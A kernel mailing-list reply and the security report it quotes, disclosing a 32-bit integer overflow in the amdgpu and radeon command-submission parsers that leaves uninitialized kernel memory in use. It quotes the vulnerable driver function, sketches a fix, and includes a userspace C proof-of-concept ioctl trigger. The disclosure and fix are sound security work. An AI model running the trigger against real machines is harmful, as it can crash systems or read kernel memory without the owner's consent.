Re: Integer overflow leads to uninitialization vulnerability in amdgpu_cs_parser_init

Sorry, I found that in the latest code this function has become amdgpu_cs_pass1, and that radeon_cs_parser_init has the same problem. I will send a patch.
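For reference, one possible shape of such a fix (a sketch of the idea only, not the actual patch) is to widen size so the byte-count multiplication can no longer wrap:

```
-	unsigned size, num_ibs = 0;
+	size_t size;	/* size *= sizeof(uint32_t) now matches kvmalloc_array's width */
+	unsigned num_ibs = 0;
```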

whitehat002 whitehat002 <hackyzh002@xxxxxxxxx> wrote on Tue, Apr 18, 2023 at 11:39:
Hello, 

I am going to file a security bug.

VULNERABILITY DETAILS

ioctl$AMDGPU_CS invokes amdgpu_cs_ioctl, which calls amdgpu_cs_parser_init. The type of size is unsigned (4 bytes) [1]. size is assigned from p->chunks[i].length_dw [2], which is copied from user_chunk.length_dw [3], an __u32 [4] (4 bytes, under user control). If size is 0x40000000, the multiplication size *= sizeof(uint32_t) [5] overflows the 32-bit unsigned type and size becomes zero. kvmalloc_array [6] does contain an overflow check, but it performs the multiplication in size_t (8 bytes), so it does not notice this 4-byte wrap. Since copy_from_user copies nothing when size is zero, and kvmalloc_array [6] is called without the __GFP_ZERO flag, p->chunks[i].kdata is left holding whatever data the allocation previously contained. That uninitialized data is then accessed [7].
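The wrap itself is ordinary 32-bit modular arithmetic; a standalone userspace sketch (illustrative only, not driver code) shows size collapsing to zero exactly as in the driver:

```c
#include <stdint.h>
#include <stdio.h>

int main(void)
{
        unsigned size = 0x40000000;  /* attacker-controlled length_dw */

        /* kvmalloc_array() multiplies in size_t (8 bytes) and sees
         * 0x100000000, so its overflow check does not fire. */
        size *= sizeof(uint32_t);    /* 32-bit multiply: result truncates */
        printf("size = %u\n", size); /* prints: size = 0 */
        return 0;
}
```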

```
struct drm_amdgpu_cs_chunk {
        __u32 chunk_id;
        __u32 length_dw; // [4]
        __u64 chunk_data;
};

static int amdgpu_cs_parser_init(struct amdgpu_cs_parser *p, union drm_amdgpu_cs *cs)
{
        struct amdgpu_fpriv *fpriv = p->filp->driver_priv;
        struct amdgpu_vm *vm = &fpriv->vm;
        uint64_t *chunk_array_user;
        uint64_t *chunk_array;
        unsigned size, num_ibs = 0; // [1]
        uint32_t uf_offset = 0;
        int i;
        int ret;

        if (cs->in.num_chunks == 0)
                return -EINVAL;

        chunk_array = kvmalloc_array(cs->in.num_chunks, sizeof(uint64_t), GFP_KERNEL);
        if (!chunk_array)
                return -ENOMEM;

        p->ctx = amdgpu_ctx_get(fpriv, cs->in.ctx_id);
        if (!p->ctx) {
                ret = -EINVAL;
                goto free_chunk;
        }

        /* skip guilty context job */
        if (atomic_read(&p->ctx->guilty) == 1) {
                ret = -ECANCELED;
                goto free_chunk;
        }

        /* get chunks */
        chunk_array_user = u64_to_user_ptr(cs->in.chunks);
        if (copy_from_user(chunk_array, chunk_array_user,
                           sizeof(uint64_t)*cs->in.num_chunks)) {
                ret = -EFAULT;
                goto free_chunk;
        }

        p->nchunks = cs->in.num_chunks;
        p->chunks = kvmalloc_array(p->nchunks, sizeof(struct amdgpu_cs_chunk),
                                   GFP_KERNEL);
        if (!p->chunks) {
                ret = -ENOMEM;
                goto free_chunk;
        }

        for (i = 0; i < p->nchunks; i++) {
                struct drm_amdgpu_cs_chunk __user **chunk_ptr = NULL;
                struct drm_amdgpu_cs_chunk user_chunk;
                uint32_t __user *cdata;

                chunk_ptr = u64_to_user_ptr(chunk_array[i]);
                if (copy_from_user(&user_chunk, chunk_ptr,
                                   sizeof(struct drm_amdgpu_cs_chunk))) {
                        ret = -EFAULT;
                        i--;
                        goto free_partial_kdata;
                }
                p->chunks[i].chunk_id = user_chunk.chunk_id;
                p->chunks[i].length_dw = user_chunk.length_dw; // [3]

                size = p->chunks[i].length_dw; // [2]
                cdata = u64_to_user_ptr(user_chunk.chunk_data);

                p->chunks[i].kdata = kvmalloc_array(size, sizeof(uint32_t), GFP_KERNEL); // [6]
                if (p->chunks[i].kdata == NULL) {
                        ret = -ENOMEM;
                        i--;
                        goto free_partial_kdata;
                }
                size *= sizeof(uint32_t); // [5]
                if (copy_from_user(p->chunks[i].kdata, cdata, size)) {
                        ret = -EFAULT;
                        goto free_partial_kdata;
                }

                switch (p->chunks[i].chunk_id) {
                case AMDGPU_CHUNK_ID_IB:
                        ++num_ibs;
                        break;

                case AMDGPU_CHUNK_ID_FENCE:
                        size = sizeof(struct drm_amdgpu_cs_chunk_fence);
                        if (p->chunks[i].length_dw * sizeof(uint32_t) < size) {
                                ret = -EINVAL;
                                goto free_partial_kdata;
                        }

                        ret = amdgpu_cs_user_fence_chunk(p, p->chunks[i].kdata, // [7]
                                                         &uf_offset);
                        if (ret)
                                goto free_partial_kdata;

                        break;

                case AMDGPU_CHUNK_ID_BO_HANDLES:
                        size = sizeof(struct drm_amdgpu_bo_list_in);
                        if (p->chunks[i].length_dw * sizeof(uint32_t) < size) {
                                ret = -EINVAL;
                                goto free_partial_kdata;
                        }

                        ret = amdgpu_cs_bo_handles_chunk(p, p->chunks[i].kdata);
                        if (ret)
                                goto free_partial_kdata;

                        break;

                case AMDGPU_CHUNK_ID_DEPENDENCIES:
                case AMDGPU_CHUNK_ID_SYNCOBJ_IN:
                case AMDGPU_CHUNK_ID_SYNCOBJ_OUT:
                case AMDGPU_CHUNK_ID_SCHEDULED_DEPENDENCIES:
                case AMDGPU_CHUNK_ID_SYNCOBJ_TIMELINE_WAIT:
                case AMDGPU_CHUNK_ID_SYNCOBJ_TIMELINE_SIGNAL:
                        break;

                default:
                        ret = -EINVAL;
                        goto free_partial_kdata;
                }
        }

        ret = amdgpu_job_alloc(p->adev, num_ibs, &p->job, vm);
        if (ret)
                goto free_all_kdata;

        if (p->ctx->vram_lost_counter != p->job->vram_lost_counter) {
                ret = -ECANCELED;
                goto free_all_kdata;
        }

        if (p->uf_entry.tv.bo)
                p->job->uf_addr = uf_offset;
        kvfree(chunk_array);

        /* Use this opportunity to fill in task info for the vm */
        amdgpu_vm_set_task_info(vm);

        return 0;

free_all_kdata:
        i = p->nchunks - 1;
free_partial_kdata:
        for (; i >= 0; i--)
                kvfree(p->chunks[i].kdata);
        kvfree(p->chunks);
        p->chunks = NULL;
        p->nchunks = 0;
free_chunk:
        kvfree(chunk_array);

        return ret;
}
```
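For completeness, a minimal userspace sketch of the trigger path. Assumptions: /dev/dri/renderD128 is an amdgpu render node, the 4 GiB kvmalloc_array allocation succeeds on the target machine, and the uapi header path matches your libdrm install; error handling is omitted, so this is illustrative rather than a tested PoC:

```c
#include <fcntl.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <drm/amdgpu_drm.h>     /* uapi header; install path may vary */

int main(void)
{
        int fd = open("/dev/dri/renderD128", O_RDWR); /* assumed amdgpu node */
        union drm_amdgpu_ctx ctx = {0};
        struct drm_amdgpu_cs_chunk chunk = {0};
        uint64_t chunk_ptr;
        union drm_amdgpu_cs cs = {0};

        /* Allocate a GPU context so amdgpu_ctx_get() succeeds. */
        ctx.in.op = AMDGPU_CTX_OP_ALLOC_CTX;
        ioctl(fd, DRM_IOCTL_AMDGPU_CTX, &ctx);

        /* length_dw = 0x40000000: kvmalloc_array() sees a 4 GiB request
         * (no size_t overflow), but size *= sizeof(uint32_t) wraps to 0,
         * so copy_from_user() copies nothing into kdata. */
        chunk.chunk_id = AMDGPU_CHUNK_ID_FENCE;
        chunk.length_dw = 0x40000000;
        chunk.chunk_data = 0;

        chunk_ptr = (uint64_t)(uintptr_t)&chunk;
        cs.in.ctx_id = ctx.out.alloc.ctx_id;
        cs.in.num_chunks = 1;
        cs.in.chunks = (uint64_t)(uintptr_t)&chunk_ptr;

        /* The fence-chunk length check is done in size_t and passes, so
         * amdgpu_cs_user_fence_chunk() then reads uninitialized kdata. */
        ioctl(fd, DRM_IOCTL_AMDGPU_CS, &cs);
        return 0;
}
```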
